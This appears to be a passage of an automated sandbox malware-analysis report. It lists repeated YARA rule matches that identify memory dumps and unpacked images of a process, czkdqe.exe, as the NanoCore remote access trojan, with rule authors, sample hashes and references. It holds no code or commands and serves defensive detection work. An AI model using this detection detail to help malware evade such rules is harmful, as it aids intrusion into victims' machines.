        Source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.264bb20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.264bb20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.264bb20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
        Source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
        Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 00000003.00000002.342122347.0000000002630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.342122347.0000000002630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: Process Memory Space: czkdqe.exe PID: 2264, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
        Source: Process Memory Space: czkdqe.exe PID: 2264, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: czkdqe.exe PID: 2264, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
        Source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
        Source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
